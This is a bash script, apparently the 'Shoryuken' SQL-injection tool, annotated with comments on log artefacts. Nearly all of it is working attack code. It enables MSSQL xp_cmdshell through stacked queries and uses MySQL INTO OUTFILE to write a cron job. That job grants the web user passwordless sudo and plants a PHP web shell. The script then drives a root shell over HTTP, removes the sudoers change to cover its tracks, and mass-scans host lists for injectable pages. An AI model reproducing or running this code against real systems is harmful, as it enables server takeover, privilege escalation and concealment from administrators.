#!/bin/bash
### Shoryuken by Brute Logic ###
# SQL-injection tool that sends one HTTP request carrying both an MSSQL
# (xp_cmdshell) and a MySQL (INTO OUTFILE) payload, then drives an HTTP
# "shell" through the file it drops in the web root (see PUNCH and SHELL).
# Observable artefacts for log review: the fixed User-Agent below; query
# strings containing sp_configure / xp_cmdshell / --sp_password, "/*!"
# version comments, "into outfile" and the path /etc/cron.d/s; and follow-up
# GETs to a random six-letter .txt or .php name directly under the web root.
# Global settings, read by the functions below.
version="1.5"
# Fixed User-Agent sent with every curl request.
agent="Mozilla/4.0"
# curl --connect-timeout (seconds) used by TEST and SCAN.
timeout=1
# Positional arguments: mode flag, target URL or input list, output file.
# None is validated; a missing $2 or $3 simply leaves the variable empty.
option=$1
target=$2
output=$3
# Windows web root used on the MSSQL path; inside double quotes "\\" yields
# one backslash, so the value ends in a single "\".
www1="c:\inetpub\wwwroot\\"
# Six random lowercase letters plus extension: the names of the files dropped
# on the target. Drawn fresh per run, so the names are not a static IoC; the
# pattern (six lowercase letters directly under the web root) is.
sh1=$(cat /dev/urandom | tr -cd a-z | head -c 6)".txt"
# Linux web root used on the MySQL path.
www2="/var/www/"
sh2=$(cat /dev/urandom | tr -cd a-z | head -c 6)".php"
### Weak Spot ###
# Pick the injection point from the query string of $target.
# Globals: target (read); param (written: the text after the last '?' and
# the last '&', i.e. the final "name=value" pair), q (written: "%27" when the
# value part contains lowercase letters, "%20" when it does not; presumably a
# quote prefix for string parameters and a space prefix for numeric ones).
# Every expansion is unquoted, so a target containing spaces or glob
# characters is word-split before sed sees it.
function WEAK_SPOT {
param=$(echo $target | sed 's/.*?//1' | sed 's/.*&//1')
# tr -cd a-z keeps only the lowercase letters of the value part.
tparam=$(echo $param | sed 's/.*=//1' | tr -cd a-z)
if [ -z $tparam ]
then
q="%20"
else
q="%27"
fi
}
### Cleaning ###
# Remove the file PUNCH dropped in the web root, via one more request.
# Globals: ptype, agent, target, target_root, www1, sh1, www2, sh2 (read).
# "[+] Cleaned." is printed whether or not the request succeeded; neither
# curl exit status is checked.
function CLEANING {
if [ "$ptype" = 'ASP' ]
then
# MSSQL: xp_cmdshell "del <www1><sh1>"; the response is discarded.
curl -A $agent -s "$target+exec+xp_cmdshell+%5Bdel%20$www1$sh1%5D" >/dev/null
else
# PHP: ask the dropped page (?c=...) to run, with sudo, a line count of
# /etc/sudoers, rm its own file, then "sed -i" the last line out of
# /etc/sudoers. "\$(" is escaped so the substitution runs on the target,
# not here. Presumably this reverts a sudoers line added during PUNCH, so
# a later look at /etc/sudoers alone may not show the change; cron and the
# web-server access log (GET /<six letters>.php?c=...) are the places to
# check.
curl -A $agent "$target_root/$sh2?c=n=\$(sudo+cat+/etc/sudoers|wc+-l);sudo+rm+$www2$sh2;sudo+sed+-i+%22\$n+d%22+/etc/sudoers"
fi
echo -e "\n[+] Cleaned."
}
### Shell ###
# Interactive loop: each typed line becomes one HTTP request to the target
# and the command output is fetched back over HTTP.
# Globals: ptype, agent, target, www1, sh1, sh2 (read); target_root, pre,
# on, t, cmd, arg1..arg3, payload (written); output is overwritten as well
# (it held the output-file argument $3).
# Leaves only on "exit"/"quit" (CLEANING runs first) or Ctrl-C; on Ctrl-C
# CLEANING never runs and the dropped file stays on the target.
function SHELL {
# Host part of $target: strip a leading "http://" and everything after the
# first "/".
target_root=$(echo $target | sed 's/http:\/\///1' | sed 's/\/.*//1')
# URL-encoded "cd .&&"; later "cd" commands are appended here so the working
# directory persists across otherwise stateless requests.
pre="cd%20.%26%26"
# on: whether each payload is printed before it is sent.
on=0
t=59
if [ "$ptype" = 'PHP' ]
then
# 59-second countdown before the first command; presumably waits for the
# cron entry written by PUNCH (/etc/cron.d/s) to fire — TODO confirm.
while [ $t -gt 0 ]
do
echo -ne "[.] Waiting $((t--)) seconds for shell...\r"
sleep 1
done
echo -e "[+] Read to go. \n"
fi
# [ 1 ] is always true; the loop ends only through the break below.
while [ 1 ]
do
# A command plus up to three arguments; read folds any further words into
# arg3. No -r, so backslashes are interpreted.
if [ "$ptype" = 'ASP' ]
then
read -p "C:\shoryuken> " cmd arg1 arg2 arg3
else
read -p "sho@ryuken:~# " cmd arg1 arg2 arg3
fi
# Only '%', '&' and '"' are URL-encoded; other characters pass through as
# typed.
arg1=$(echo $arg1 | sed 's/%/%25/g'| sed 's/&/%26/g' | sed 's/"/%22/g')
arg2=$(echo $arg2 | sed 's/%/%25/g'| sed 's/&/%26/g' | sed 's/"/%22/g')
arg3=$(echo $arg3 | sed 's/%/%25/g'| sed 's/&/%26/g' | sed 's/"/%22/g')
case $cmd in
# "?" is a glob pattern here, so any single-character command prints this
# help text.
?) echo -e "[+] Type on/off to display payload or not (default off).\n[+] Append &&echo after echo commands to write to a file.\n";;
exit|quit) CLEANING
break;;
on) echo -e "[+] Payload display is ON.\n"
on=1;;
off) echo -e "[+] Payload display is OFF.\n"
on=0;;
*) if [ "$cmd" = 'cd' ]
then
# cd is never sent on its own: it is accumulated into the prefix of every
# later command.
pre="$pre$cmd%20$arg1%20$arg2%20$arg3%26%26"
else
if [ "$ptype" = 'ASP' ]
then
# MSSQL: run the command through xp_cmdshell with its output redirected
# into <www1><sh1>, which is then fetched over HTTP below.
cmd="$pre$cmd%20$arg1%20$arg2%20$arg3"
payload="+exec+xp_cmdshell+%5B$cmd>$www1$sh1%5D+--sp_password+"
else
# PHP: the command is prefixed with sudo and passed as the c= parameter of
# the dropped page.
cmd="$pre%20sudo%20$cmd%20$arg1%20$arg2%20$arg3"
payload="$cmd"
fi
if [ $on = 1 ]
then
echo -e "[+] Payload: $payload"
echo ""
fi
if [ "$ptype" = 'ASP' ]
then
# Two requests per command on MSSQL: the injection (response discarded),
# then a GET of the output file. output is the global from $3, clobbered.
curl -A $agent -s "$target$payload" >/dev/null
output=$sh1
else
# One request per command on PHP: GET /<sh2>?c=<payload>.
output=$sh2?c=$payload
fi
curl -A $agent "$target_root/$output"
echo ""
fi
esac
done
}
### Punch ###
# Send the single "shoryuken" request (an MSSQL and a MySQL payload in the
# same URL), classify the HTTP status and, on 200, hand over to SHELL.
# Globals: target, agent, www1, sh1, www2, sh2 (read); param, q (via
# WEAK_SPOT), mssqli, hex, mysqli, shoryuken, status, PHP, ASP, ptype
# (written).
# Whether the target was actually exploited is never verified: status 200
# alone leads to SHELL.
function PUNCH {
WEAK_SPOT
# MSSQL stacked queries: sp_configure enabling xp_cmdshell, then xp_cmdshell
# writing whoami output into <www1><sh1>. sed rewrites every "+" separator
# into "/*&<param>*/" (an inline comment), so the request carries the
# parameter name repeated inside comments — a distinctive log pattern.
mssqli=$(echo "$q+exec+sp_configure+%5Bshow%20advanced%20options%5D,1+reconfigure+exec+sp_configure%5Bxp_cmdshell%5D,1+reconfigure+exec+xp_cmdshell+%5Bwhoami>$www1$sh1%5D+--sp_password+" | sed -e "s/+/\/\*\&$param\*\//g")
# Hex encoding (od -t x1, spaces and newlines removed) of the path of the
# PHP file to be dropped; appended to the MySQL payload below.
hex=$(echo $www2$sh2 | od -A n -t x1 | sed 's/ //g' | tr -d '\n')
# MySQL: a "/*!" version comment carrying INTO OUTFILE to /etc/cron.d/s with
# a fixed hex literal as content (not decoded here) followed by $hex. The
# target path implies a cron-driven step; the sudoers edit in CLEANING and
# the sudo prefix in SHELL are consistent with that. Relies on the FILE
# privilege and a DB server able to write /etc/cron.d (the HELP text says
# "OS user ROOT"); mitigations are secure_file_priv, no FILE grant for the
# application user and not running the DB as root.
mysqli="$q/*!+into+outfile%22/etc/cron.d/s%22+fields+enclosed+by+0x23+lines+terminated+by+0x0A2A202A202A202A202A20726F6F74202F62696E2F6563686F20277777772D6461746120414C4C3D28414C4C29204E4F5041535357443A20414C4C273E3E2F6574632F7375646F6572732026202F62696E2F726D202F6574632F63726F6E2E642F732026202F62696E2F6563686F20273C3F706870206563686F20706173737468727528245F4745545B635D293B203F3E273E$hex*/#"
# Both payloads in one GET: <target><mssqli>&<param><mysqli>; -i keeps the
# response headers for the checks below.
shoryuken=$(curl -A $agent -s -i "$target$mssqli&$param$mysqli")
# Status code from the first response line: drop "HTTP" plus four characters
# ("/1.1"), then keep only the digits 0-5. Codes containing a 6-9 digit are
# truncated (e.g. 206 -> 20) and end up in the default branch.
status=$(echo -e "$shoryuken" | head -n 1 | sed "s/HTTP....//1" | tr -cd 0-5)
# Backend guess from the X-Powered-By header; anything that is not ASP
# (including no header at all) is treated as PHP. PHP is set but never read.
PHP=$(echo -e "$shoryuken" | grep X-Powered-By | grep PHP)
ASP=$(echo -e "$shoryuken" | grep X-Powered-By | grep ASP)
if [ -n "$ASP" ]
then
ptype="ASP"
else
ptype="PHP"
fi
case $status in
200) echo -e "[!] Punch given (status code 200), enjoy your shell if vulnerable.\n"
echo -e "[*] Type ? to help.\n"
SHELL
# This break is outside any loop in this function; whether it leaves the
# caller's "for i in 1" loop depends on the bash version — TODO confirm.
break;;
301) echo -e "[-] Punch dodged (status code 301), review target.";;
# The message text says 301, but this arm matches 302.
302) echo -e "[-] Punch dodged (status code 301), review target.";;
404) echo -e "[-] Punch missed (status code 404), review target.";;
500) echo -e "[-] Punch failed (status code 500), maybe detected.";;
503) echo -e "[-] Server is down (status code 503), try again.";;
*) echo -e "[-] An error occurred, review your settings.";;
esac
}
### Test ###
# Blind check: request the page once plainly and once with a condition
# payload for each DBMS; an identical response size with status 200 is
# reported as "may be vulnerable" (the injected condition left the page
# unchanged).
# Globals: target, agent, timeout (read); param, q (via WEAK_SPOT), mssqli,
# mysqli, req1, req2, status, vuln (written; vuln is 1 or 0).
# The two sizes are not measured the same way: req1 is wc -c on curl's raw
# output, req2 is wc -c on "echo -ne" of the captured text (trailing
# newlines stripped by $(...), backslash escapes interpreted), so the
# equality test is biased towards "not vulnerable" on some pages.
function TEST {
WEAK_SPOT
# MSSQL: "and 0<(select is_srvrolemember(...))" with a hex-encoded role
# name; "+" separators become "/*&<param>*/" comments as in PUNCH.
mssqli=$(echo "$q+and+0<(+select+is_srvrolemember+(convert+(char,0x73797361646D696E)));--sp_password+" | sed -e "s/+/\/\*\&$param\*\//g")
# MySQL: "/*!" version comment with load_file() on two hex-encoded paths
# (presumably MySQL config files — the HELP text ties the test to FILE
# privileges) and locate() of a hex-encoded string in their contents.
mysqli="$q/*!+and+0<locate(0x3d726f6f74,replace(load_file(0x2f6574632f6d7973716c2f6d792e636e66),0x20,0x3D))+or+0<locate(0x3d726f6f74,replace(load_file(0x2f6574632f6d792e636e66),0x20,0x3D))*/#"
# Baseline response size, headers included (-i).
req1=$(curl -A $agent --connect-timeout $timeout -s -i "$target" | wc -c)
req2=$(curl -A $agent --connect-timeout $timeout -s -i "$target$mssqli&$param$mysqli")
# Status parsing as in PUNCH: strip "HTTP" + 4 characters, keep digits 0-5.
status=$(echo -e "$req2" | head -n 1 | sed "s/HTTP....//1" | tr -cd 0-5)
req2=$(echo -ne "$req2" | wc -c)
# A zero size means the request produced nothing (e.g. connect timeout) and
# is reported as "not vulnerable" rather than as an error. -o is the
# deprecated test(1) "or".
if [ $req1 = 0 -o $req2 = 0 ]
then
echo -e "[-] Not vulnerable to shoryuken."
vuln=0
else
if [ $status = 200 ]
then
if [ $req1 = $req2 ]
then
echo -e "[!] Target may be VULNERABLE to shoryuken."
vuln=1
else
echo -e "[-] Not vulnerable to shoryuken."
vuln=0
fi
else
echo -e "[-] It was not possible to test the target."
vuln=0
fi
fi
}
### List Mode ###
# Run TEST against every entry of the file named by $target and append the
# entries flagged vulnerable to ./$output.
# Globals: target (read as a file name, then overwritten per line), output
# (read), vuln (read; set by TEST).
# $(cat $target) word-splits on whitespace and globs each word; $output is
# unquoted throughout.
function LIST {
touch ./$output
for line in $(cat $target)
do
# TEST reads the global target, so it is replaced with the current line.
target=$line
TEST
if [ $vuln = 1 ]
then
echo $target >> ./$output
fi
done
# The count is taken from the file, so lines already present in $output
# before this run are included.
echo -e "\n[+] Found "$(cat $output | wc -l)" vulnerable targets."
}
### Scan Mode ###
# For every host in the file named by $target, request six fixed candidate
# paths with "?id=1" and record the ones answering 200 in $output.
# Globals: target, output, agent, timeout (read); try, line, n, scan
# (written).
# Log signature: up to six sequential GETs per host for /?id=1,
# /index.php?id=1, /default.asp?id=1, /default.aspx?id=1, /article.php?id=1
# and /article.asp?id=1 from the fixed User-Agent, 1-second connect timeout.
function SCAN {
try[1]="/?id=1"
try[2]="/index.php?id=1"
try[3]="/default.asp?id=1"
try[4]="/default.aspx?id=1"
try[5]="/article.php?id=1"
try[6]="/article.asp?id=1"
touch ./$output
for line in $(cat $target)
do
for n in {1..6}
do
# The requested URL is "$line/${try[$n]}" — a double slash, since every
# try[] entry already starts with "/"; the printed and recorded URL below
# has a single slash. Status parsing as in PUNCH (digits 0-5 only).
scan=$(curl -A $agent --connect-timeout $timeout -s -i "$line/${try[$n]}" | head -n 1 | sed "s/HTTP....//1" | tr -cd 0-5)
# Empty status (no response, or no usable status line): skip the remaining
# paths for this host.
if [ -z $scan ]
then
break
fi
if [ $scan = 200 ]
then
echo -e "[!] Found: $line${try[$n]}"
echo "$line${try[$n]}" >> $output
fi
done
done
}
### Interactive Mode ###
# Prompt for a target on stdin, optionally run TEST, then PUNCH.
# Globals: t, v, target (written); plus everything TEST and PUNCH use.
# The "break" statements below are outside any loop in this function. In
# the intended flow they leave the "for i in 1" wrapper at the bottom of the
# file, but whether a break inside a function reaches the caller's loop
# depends on the bash version and POSIX mode — TODO confirm. If it does not,
# control falls through to PUNCH even after "Quitting...".
function INTERACTIVE {
echo -e "[?] Type target (format: domain/path/page?parameter_to_test=value):"
# No -r: backslashes in the typed target are interpreted.
read t
if [ -z $t ]
then
echo -e "[-] Target can not be blank, quitting..."
break
else
target=$t
fi
echo -e "\n[?] Test if it is vulnerable first?\n[1] Yes\n[2] Skip this step\n"
# One silent keypress.
read -s -n 1 v
case $v in
1) TEST
echo -e "\n[?] Continue?\n[1] Yes\n[2] No\n"
read -s -n 1 v
case $v in
1) echo -e "[+] Preparing rising dragon punch...";;
2) echo -e "[-] Quitting..."
break;;
*) echo -e "[-] Invalid option, quitting..."
break;;
esac;;
2) echo -e "[+] Preparing rising dragon punch...";;
*) echo -e "[-] Invalid option, quitting..."
break;;
esac
PUNCH
}
### Help Menu ###
# Print author, description, usage and examples, then break out of the
# single-iteration wrapper loop at the bottom of the file (break inside a
# function is bash-version dependent — TODO confirm).
# The Options section lists "-t" twice ("test mode" and "test from list")
# and never "-l", while the dispatcher binds list mode to -l, as the last
# example shows.
function HELP {
echo -e "Author:\n\tBrute Logic (http://about.me/brutelogic) Twitter @brutelogic\n\nDescription:\n\tShoryuken is a tool designed to get full control of poorly configurated web applications with backend DBMS in the same machine. In its current version, it uses SQL injection techniques to own MYSQL and MSSQL hosts when they run as OS user ROOT with application user having file privileges (Linux MySQL) or as DB sysadmin user with DB running as OS user SYSTEM (Windows MSSQL). It is done using the same unique HTTP request, the shoryuken (that means \"rising dragon punch\" in japanese).\n\tAfter successful exploitation, a custom \"shell\" is provided using only port 80 (it will be always there) without need to download anything or relying on firewall's policy.\n\tShoryuken needs curl installed (Debian-like systems: apt-get install curl).\n\nUsage:\n\t./shoryuken$version [OPTION] {TARGET | INPUT_FILE} {OUTPUT_FILE}\n\t=> Rearrange URL if needed to put vulnerable parameter ALWAYS at the end.\n\nOptions:\n\t-h\thelp\n\t-i\tinteractive mode\n\t-p\tdirect punch\n\t-t\ttest mode\n\t-s\tscan from list\n\t-t\ttest from list\n\nExamples:\n\t./shoryuken$version -i\n\t./shoryuken$version -p \"192.168.0.2/test.asp?id=1\"\n\t./shoryuken$version -p \"vuln-site.net/home/news.php?info=text&vuln_param=11230\"\n\t./shoryuken$version -t \"www.example.com/page.php?name=john\"\n\t./shoryuken$version -s hosts.txt mytargets.txt\n\t./shoryuken$version -l mytargets.txt vulnerables.txt"
break
}
### BEGIN ###
echo -e "[+] Shoryuken $version started.\n"
# Single-iteration loop so that the "break" statements inside the mode
# functions have a loop to leave (whether a break inside a function reaches
# this loop is bash-version dependent — TODO confirm).
# Modes: -i interactive, -h help, -l test every target in a list file,
# -p punch (exploit), -s scan a host list for candidate pages, -t test one
# target. Neither the presence of curl nor the $2/$3 arguments is checked.
for i in 1
do
case $option in
-i) INTERACTIVE;;
-h) HELP;;
-l) LIST;;
-p) PUNCH;;
-s) SCAN;;
-t) TEST;;
*) echo -e "[-] Invalid option, quitting..."
break;;
esac
done
echo -e "\n[+] Done."